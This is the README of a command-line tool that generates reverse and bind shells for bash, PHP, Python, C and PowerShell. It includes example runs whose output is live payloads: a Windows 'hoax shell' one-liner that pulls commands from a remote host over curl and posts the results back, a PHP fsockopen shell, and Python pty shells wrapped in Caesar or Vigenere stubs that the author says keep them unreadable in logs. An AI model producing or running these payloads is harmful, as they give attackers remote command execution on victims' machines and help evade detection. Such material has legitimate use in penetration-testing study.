Shells from: revshell
Description: Quick little tool I made to quickly and easily generate reverse shells (Hoax shells, Python, PHP, C, etc...)
This tool also supports URL encoding and base64 encoding (URL safe).
Simply clone the repository:
git clone https://github.com/supaaasuge/genrevshells
cd genrevshells
# mv/cp/ln genrevshell.py to /usr/local/bin or /usr/bin so it can be called from any location on the command line
ln -s genrevshell.py /usr/local/bin/genrevshell.py./genrevshell.py --help
usage: genrevshell.py [-h] [-i IP] [-p PORT] [-s {bash,nc,php,pty,powershell,python,c}] [-v VERSION] [-f FILENAME]
[-e {base64,url,caesar,vigenere}] [-k KEY] [-b] [-l] [-ho]
Generate customized reverse or bind shell scripts with optional encryption.
options:
-h, --help show this help message and exit
-i IP, --ip IP IP address for the reverse shell to connect to.
-p PORT, --port PORT Port number for the reverse shell to connect to.
-s {bash,nc,php,pty,powershell,python,c}, --shell {bash,nc,php,pty,powershell,python,c}
Type of reverse shell to generate.
-v VERSION, --version VERSION
Version of the shell type, if applicable.
-f FILENAME, --filename FILENAME
Filename to save the generated shell script. If not provided, output to standard output.
-e {base64,url,caesar,vigenere}, --encoding {base64,url,caesar,vigenere}
Type of encoding to use on the shell.
-k KEY, --key KEY Key for Caesar or Vigenere cipher if required by the encoding type.
-b, --bind Generate a bind shell instead of a reverse shell.
-l, --list List all available shells for the specified shell type.
-ho, --hoax Generate a hoax shell.To see all the bash shells and the version:
./genrevshell.py -s bash -l-s: specifies the shell type-l: List all shell verison. This will print all versions available to standard output.
To generate a standard small C reverse shell:
./genrevshell.py -s c -i MACHINE_IP -p PORT -f <filename>To generate a Windows C rever shell:
./genrevshell.py -s c -v windows -i MACHINE_IP -p PORT -f <filename>Generating a bash reverse shell using version from -v {...}:
./genrevshell.py -s bash -v {1,2,3,4,udp} -i MACHINE_IP -p PORT
# append > <filename>
# OR
# -f <filename> to write to fileGenerating a python reverse shell file to be ran from the command line:
./genrevshell.py -s python -i MACHINE_IP -p PORT -f <filename>Generating a python reverse shell to be input from the command line, script will just print it.
./genrevshell.py -s python -v {1,2,3,windows} -i MACHINE_IP -p PORTHoax shells:
./genrevshell.py -ho -v 2 -i 8.8.8.8 -p 8888
@echo off&cmd /V:ON /C "SET ip=8.8.8.8:8888&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!cmd.bat & type !temp!cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!cmd.bat > !tmp!out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!out.txt > NUL)) & timeout 1" > NUL
[+] Reverse shell generator [+]
Shells from: https://revshells.com/
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -ho -v 1 -i 8.8.8.8 -p 8888
@echo off&cmd /V:ON /C "SET ip=8.8.8.8:8888&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!cmd.bat & type !temp!cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!cmd.bat > !tmp!out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!out.txt > NUL)) & timeout 1" > NUL
[+] Reverse shell generator [+]
Shells from: https://revshells.com/Available encoded currently: URL encoding, base64 encoding, caesar encoding (Python only), vigenere encoding. (Python only).
vigenereandcaesertake in an argument-k <key|int(caesar)|str(vigenere)>.
Examples:
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s php -v 1 -i 8.8.8.8 -p 8888 -e base64
php -r $sock=fsockopen("8.8.8.8",8888);passthru("sh <&3 >&3 2>&3");
cGhwIC1yICRzb2NrPWZzb2Nrb3BlbigiOC44LjguOCIsODg4OCk7cGFzc3RocnUoInNoIDwmMyA-JjMgMj4mMyIpOw==
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s php -v 1 -i 8.8.8.8 -p 8888 -e url
php -r $sock=fsockopen("8.8.8.8",8888);passthru("sh <&3 >&3 2>&3");
php%20-r%20%24sock%3Dfsockopen%28%228.8.8.8%22%2C8888%29%3Bpassthru%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s php -v 1 -i 8.8.8.8 -p 8888
php -r $sock=fsockopen("8.8.8.8",8888);passthru("sh <&3 >&3 2>&3");
[+] Reverse shell generator [+]
Shells from: https://revshells.com/
Caeser rot 3, Caesar rot 13, and Vigenere. A 'stub' is prepended to the reverse shell encased in exec to decrypt the code back to normal before it runs. When entered into a terminal, it will show up encrypted in the log file. I plan to add many forms of encryption/obfuscation for shits n gigs ofc.
./genrevshell.py -s python -v 1 -i 8.8.8.8 -p 8888 -e vigenere -k MY_SUPER_SECRET_KEY
exec("".join(chr((ord(c) - ord(k) - (65 if c.isupper() else 97)) % 26 + (65 if c.isupper() else 97)) if c.isalpha() else c for c, k in zip("digtyv VYTJI="8.8.8.8";lzgsiy GTFXK=8888;ufvyse3 -g 'zjgzqe xfu,wfhbtx,uj,gex;j=zqtovy.hstqvq();d.hvpeity((sj.xbkpmg("YJFWK"),mez(lj.fpkjux("IUFGX"))));[zj.kwg2(x.umckel(),qu) hfv ku me (0,1,2)];rkc.xgpae("py")'", cycle("MY_SUPER_SECRET_KEY"))))
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s python -v 1 -i 8.8.8.8 -p 8888 -e caesar -k 3
exec(''.join(chr((ord(c)-97+3)%26+97)if c.isalpha()else c for c in"hasruw UKRVW="8.8.8.8";hasruw USRUW=8888;sbwkrq3 -f 'lpsruw vbv,vrfnhw,rv,swb;v=vrfnhw.vrfnhw();v.frqqhfw((rv.jhwhqy("UKRVW"),lqw(rv.jhwhqy("USRUW"))));[rv.gxs2(v.ilohqr(),ig) iru ig lq (0,1,2)];swb.vsdzq("vk")'"))
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s python -v 1 -i 8.8.8.8 -p 8888 -e caesar -k 13
exec(''.join(chr((ord(c)-97+13)%26+97)if c.isalpha()else c for c in"rkcbeg EUBFG="8.8.8.8";rkcbeg ECBEG=8888;clguba3 -p 'vzcbeg flf,fbpxrg,bf,cgl;f=fbpxrg.fbpxrg();f.pbaarpg((bf.trgrai("EUBFG"),vag(bf.trgrai("ECBEG"))));[bf.qhc2(f.svyrab(),sq) sbe sq va (0,1,2)];cgl.fcnja("fu")'"))
~/Projects/Rev-Shell-Gen via 🐍 v3.12.3
❯ ./genrevshell.py -s python -v 1 -i 8.8.8.8 -p 8888 -e vigenere -k MY_SUPER_SECRET_KEY
exec("".join(chr((ord(c) - ord(k) - (65 if c.isupper() else 97)) % 26 + (65 if c.isupper() else 97)) if c.isalpha() else c for c, k in zip("digtyv VYTJI="8.8.8.8";lzgsiy GTFXK=8888;ufvyse3 -g 'zjgzqe xfu,wfhbtx,uj,gex;j=zqtovy.hstqvq();d.hvpeity((sj.xbkpmg("YJFWK"),mez(lj.fpkjux("IUFGX"))));[zj.kwg2(x.umckel(),qu) hfv ku me (0,1,2)];rkc.xgpae("py")'", cycle("MY_SUPER_SECRET_KEY"))))Obviously this is pretty sloppy code, but it works... That's all the matters. Feel free to make a pull request and improve anything
Enjoy...